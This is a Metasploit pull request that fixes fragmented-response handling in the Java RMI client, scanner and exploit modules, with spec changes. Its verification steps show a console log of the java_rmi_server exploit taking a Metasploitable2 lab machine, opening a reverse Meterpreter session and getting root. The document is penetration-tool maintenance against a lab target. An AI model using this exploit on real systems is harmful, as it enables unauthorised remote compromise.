### PR TITLE
Fix #6050 - Java RMI scanner stack traces against Metasploitable2

### DIFF
--- a/lib/msf/java/rmi/client.rb
+++ b/lib/msf/java/rmi/client.rb
@@ -121,7 +121,7 @@ module Msf
         #
         # @param nsock [Rex::Socket::Tcp]
         # @return [String]
-        def safe_get_once(nsock = sock)
+        def safe_get_once(nsock = sock, read_loop_timeout = 1)
           data = ''
           begin
             res = nsock.get_once
@@ -129,7 +129,7 @@ module Msf
             res = nil
           end
 
-          until res.nil? || res.length < 1448
+          while res && nsock.has_read_data?(read_loop_timeout)
             data << res
             begin
               res = nsock.get_once

--- a/lib/msf/java/rmi/client.rb
+++ b/lib/msf/java/rmi/client.rb
@@ -19,6 +19,23 @@ module Msf
         include Msf::Java::Rmi::Client::Jmx
         include Exploit::Remote::Tcp
 
+        def initialize(info = {})
+          super
+
+          register_advanced_options(
+            [
+              OptInt.new('RmiReadLoopTimeout', [ true, 'Maximum number of seconds to wait for data between read iterations', 1])
+            ], Msf::Java::Rmi::Client
+          )
+        end
+
+        # Returns the timeout to wait for data between read iterations
+        #
+        # @return [Fixnum]
+        def read_loop_timeout
+          datastore['RmiReadLoopTimeout'] || 1
+        end
+
         # Returns the target host
         #
         # @return [String]
@@ -121,7 +138,7 @@ module Msf
         #
         # @param nsock [Rex::Socket::Tcp]
         # @return [String]
-        def safe_get_once(nsock = sock, read_loop_timeout = 1)
+        def safe_get_once(nsock = sock, loop_timeout = read_loop_timeout)
           data = ''
           begin
             res = nsock.get_once
@@ -129,7 +146,7 @@ module Msf
             res = nil
           end
 
-          while res && nsock.has_read_data?(read_loop_timeout)
+          while res && nsock.has_read_data?(loop_timeout)
             data << res
             begin
               res = nsock.get_once

--- a/lib/msf/java/rmi/client.rb
+++ b/lib/msf/java/rmi/client.rb
@@ -19,23 +19,6 @@ module Msf
         include Msf::Java::Rmi::Client::Jmx
         include Exploit::Remote::Tcp
 
-        def initialize(info = {})
-          super
-
-          register_advanced_options(
-            [
-              OptInt.new('RmiReadLoopTimeout', [ true, 'Maximum number of seconds to wait for data between read iterations', 1])
-            ], Msf::Java::Rmi::Client
-          )
-        end
-
-        # Returns the timeout to wait for data between read iterations
-        #
-        # @return [Fixnum]
-        def read_loop_timeout
-          datastore['RmiReadLoopTimeout'] || 1
-        end
-
         # Returns the target host
         #
         # @return [String]
@@ -103,9 +86,8 @@ module Msf
         # @see Rex::Proto::Rmi::Model::ProtocolAck.decode
         def recv_protocol_ack(opts = {})
           nsock = opts[:sock] || sock
-          data = safe_get_once(nsock)
           begin
-            ack = Rex::Proto::Rmi::Model::ProtocolAck.decode(StringIO.new(data))
+            ack = Rex::Proto::Rmi::Model::ProtocolAck.decode(nsock)
           rescue Rex::Proto::Rmi::DecodeError
             return nil
           end
@@ -123,40 +105,14 @@ module Msf
         # @see Rex::Proto::Rmi::Model::ReturnData.decode
         def recv_return(opts = {})
           nsock = opts[:sock] || sock
-          data = safe_get_once(nsock)
 
           begin
-            return_data = Rex::Proto::Rmi::Model::ReturnData.decode(StringIO.new(data))
+            return_data = Rex::Proto::Rmi::Model::ReturnData.decode(nsock)
           rescue Rex::Proto::Rmi::DecodeError
             return nil
           end
 
           return_data.return_value
-        end
-
-        # Helper method to read fragmented data from a ```Rex::Socket::Tcp```
-        #
-        # @param nsock [Rex::Socket::Tcp]
-        # @return [String]
-        def safe_get_once(nsock = sock, loop_timeout = read_loop_timeout)
-          data = ''
-          begin
-            res = nsock.get_once
-          rescue ::EOFError
-            res = nil
-          end
-
-          while res && nsock.has_read_data?(loop_timeout)
-            data << res
-            begin
-              res = nsock.get_once
-            rescue ::EOFError
-              res = nil
-            end
-          end
-
-          data << res if res
-          data
         end
       end
     end

--- a/modules/auxiliary/scanner/misc/java_rmi_server.rb
+++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary
       if exception.class == Rex::Java::Serialization::Model::NewObject &&
           exception.class_desc.description.class == Rex::Java::Serialization::Model::NewClassDesc &&
           exception.class_desc.description.class_name.contents == 'java.lang.ClassNotFoundException'&&
-          exception.class_data[0].class == Rex::Java::Serialization::Model::NullReference &&
+          [Rex::Java::Serialization::Model::NullReference, Rex::Java::Serialization::Model::Reference].include?(exception.class_data[0].class) &&
           !exception.class_data[1].contents.include?('RMI class loader disabled')
           return true
       end

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -154,13 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
       arguments: build_dgc_clean_args(new_url)
     )
 
-    begin
-      return_value = recv_return
-    rescue Rex::StreamClosedError
-      # There should be a session...
-      disconnect
-      return
-    end
+    return_value = recv_return
 
     if return_value.nil? && !session_created?
       fail_with(Failure::Unknown, 'RMI Call failed')

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -154,7 +154,13 @@ class Metasploit3 < Msf::Exploit::Remote
       arguments: build_dgc_clean_args(new_url)
     )
 
-    return_value = recv_return
+    begin
+      return_value = recv_return
+    rescue Rex::StreamClosedError
+      # There should be a session...
+      disconnect
+      return
+    end
 
     if return_value.nil? && !session_created?
       fail_with(Failure::Unknown, 'RMI Call failed')

--- a/spec/lib/msf/java/rmi/client/jmx/connection_spec.rb
+++ b/spec/lib/msf/java/rmi/client/jmx/connection_spec.rb
@@ -105,6 +105,10 @@ describe Msf::Java::Rmi::Client::Jmx::Connection do
         allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
           io.read
         end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
+        end
       end
 
       it "returns true" do
@@ -125,6 +129,10 @@ describe Msf::Java::Rmi::Client::Jmx::Connection do
         allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
           io.read
         end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
+        end
       end
 
       it "returns true" do
@@ -144,6 +152,10 @@ describe Msf::Java::Rmi::Client::Jmx::Connection do
 
         allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
           io.read
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
         end
       end
 

--- a/spec/lib/msf/java/rmi/client/jmx/connection_spec.rb
+++ b/spec/lib/msf/java/rmi/client/jmx/connection_spec.rb
@@ -101,14 +101,6 @@ describe Msf::Java::Rmi::Client::Jmx::Connection do
           io.write(get_object_instance_response)
           io.seek(0)
         end
-
-        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
-          io.read
-        end
-
-        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
-          false
-        end
       end
 
       it "returns true" do
@@ -125,14 +117,6 @@ describe Msf::Java::Rmi::Client::Jmx::Connection do
           io.write(create_mbean_response)
           io.seek(0)
         end
-
-        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
-          io.read
-        end
-
-        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
-          false
-        end
       end
 
       it "returns true" do
@@ -148,14 +132,6 @@ describe Msf::Java::Rmi::Client::Jmx::Connection do
           io.seek(0)
           io.write(invoke_response)
           io.seek(0)
-        end
-
-        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
-          io.read
-        end
-
-        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
-          false
         end
       end
 

--- a/spec/lib/msf/java/rmi/client/jmx/connection_spec.rb
+++ b/spec/lib/msf/java/rmi/client/jmx/connection_spec.rb
@@ -101,6 +101,14 @@ describe Msf::Java::Rmi::Client::Jmx::Connection do
           io.write(get_object_instance_response)
           io.seek(0)
         end
+
+        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
+          io.read
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
+        end
       end
 
       it "returns true" do
@@ -117,6 +125,14 @@ describe Msf::Java::Rmi::Client::Jmx::Connection do
           io.write(create_mbean_response)
           io.seek(0)
         end
+
+        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
+          io.read
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
+        end
       end
 
       it "returns true" do
@@ -132,6 +148,14 @@ describe Msf::Java::Rmi::Client::Jmx::Connection do
           io.seek(0)
           io.write(invoke_response)
           io.seek(0)
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
+          io.read
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
         end
       end
 

--- a/spec/lib/msf/java/rmi/client/jmx/server_spec.rb
+++ b/spec/lib/msf/java/rmi/client/jmx/server_spec.rb
@@ -47,14 +47,6 @@ describe Msf::Java::Rmi::Client::Jmx::Server do
           io.write(new_client_response)
           io.seek(0)
         end
-
-        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
-          io.read
-        end
-
-        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
-          false
-        end
       end
 
       it "returns the reference information" do

--- a/spec/lib/msf/java/rmi/client/jmx/server_spec.rb
+++ b/spec/lib/msf/java/rmi/client/jmx/server_spec.rb
@@ -51,6 +51,10 @@ describe Msf::Java::Rmi::Client::Jmx::Server do
         allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
           io.read
         end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
+        end
       end
 
       it "returns the reference information" do

--- a/spec/lib/msf/java/rmi/client/jmx/server_spec.rb
+++ b/spec/lib/msf/java/rmi/client/jmx/server_spec.rb
@@ -47,6 +47,14 @@ describe Msf::Java::Rmi::Client::Jmx::Server do
           io.write(new_client_response)
           io.seek(0)
         end
+
+        allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
+          io.read
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
+        end
       end
 
       it "returns the reference information" do

--- a/spec/lib/msf/java/rmi/client/registry_spec.rb
+++ b/spec/lib/msf/java/rmi/client/registry_spec.rb
@@ -163,6 +163,10 @@ describe Msf::Java::Rmi::Client::Registry do
         allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
           io.read
         end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
+        end
       end
 
       it "returns empty array" do
@@ -180,6 +184,10 @@ describe Msf::Java::Rmi::Client::Registry do
 
         allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
           io.read
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
         end
       end
 
@@ -202,6 +210,10 @@ describe Msf::Java::Rmi::Client::Registry do
         allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
           io.read
         end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
+        end
       end
 
       it "raises an Rex::Proto::Rmi::Exception" do
@@ -219,6 +231,10 @@ describe Msf::Java::Rmi::Client::Registry do
 
         allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
           io.read
+        end
+
+        allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+          false
         end
       end
 

--- a/spec/lib/msf/java/rmi/client_spec.rb
+++ b/spec/lib/msf/java/rmi/client_spec.rb
@@ -48,6 +48,10 @@ describe Msf::Java::Rmi::Client do
     allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
       io.read
     end
+
+    allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+      false
+    end
   end
 
   describe "#send_header" do

--- a/spec/lib/msf/java/rmi/client_spec.rb
+++ b/spec/lib/msf/java/rmi/client_spec.rb
@@ -44,14 +44,6 @@ describe Msf::Java::Rmi::Client do
     allow_any_instance_of(::StringIO).to receive(:put) do |io, data|
       io.write(data)
     end
-
-    allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
-      io.read
-    end
-
-    allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
-      false
-    end
   end
 
   describe "#send_header" do

--- a/spec/lib/msf/java/rmi/client_spec.rb
+++ b/spec/lib/msf/java/rmi/client_spec.rb
@@ -44,6 +44,14 @@ describe Msf::Java::Rmi::Client do
     allow_any_instance_of(::StringIO).to receive(:put) do |io, data|
       io.write(data)
     end
+
+    allow_any_instance_of(::StringIO).to receive(:get_once) do |io, length, timeout|
+      io.read
+    end
+
+    allow_any_instance_of(::StringIO).to receive(:has_read_data?) do |io|
+      false
+    end
   end
 
   describe "#send_header" do


### PR DESCRIPTION
I was also able to reproduce the stack trace provided by @hmoore-r7. Here is my analysis: the java serialized responses are being split on different TCP packets. I was expecting to not see TCP fragmentation even on ~500 bytes packets, but I was definitely wrong :(. So `Msf::Java::Rmi::Client#safe_get_once` is not reading correctly fragmented responses.

~~This pull request tries to change Msf::Java::Rmi::Client#safe_get_once to deal with it, basically adding a user configurable timeout to wait between "#get_once" calls. The default timeout "1" is enough on my tests. But the user can make it bigger with the new datastore option RmiReadLoopTimeout.~~

This pull request deletes `Msf::Java::Rmi::Client#safe_get_once` and favors using Rex sockets as IO. Of course it uses #read instead of #get_once now.  
## Verification
- [ ] Deploy a Metasploitable2 virtual machine
- [ ] Run the auxiliary/scanner/misc/java_rmi_server against the metasploitable2 machine, VERIFY it shows as vulnerable

```
msf > use auxiliary/scanner/misc/java_rmi_server
msf auxiliary(java_rmi_server) > set rhosts 172.16.158.131
rhosts => 172.16.158.131
msf auxiliary(java_rmi_server) > run

[+] 172.16.158.131:1099 Java RMI Endpoint Detected: Class Loader Enabled
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
- [ ] Run the exploit/multi/misc/java_rmi_server against the metasploitable2 machine, VERIFY you get a session

```
msf auxiliary(java_rmi_server) > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > set rhost 172.16.158.131
rhost => 172.16.158.131
msf exploit(java_rmi_server) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST      172.16.158.131   yes       The target address
   RPORT      1099             yes       The target port
   SRVHOST    172.16.158.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Using URL: http://172.16.158.1:8080/7Vjcmb
[*] Server started.
[*] 172.16.158.131:1099 - Sending RMI Header...
[*] 172.16.158.131:1099 - Sending RMI Call...
[*] 172.16.158.131   java_rmi_server - Replied to request for payload JAR
[*] Sending stage (45643 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:43075) at 2015-10-09 11:26:38 -0500
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

```
- [ ] If you get exceptions on java_rmi_server, try making RmiReadLoopTimeout bigger: `set RmiReadLoopTimeout 5`

```
   Name           : RmiReadLoopTimeout
   Current Setting: 1
   Description    : Maximum number of seconds to wait for data between read
      iterations
```
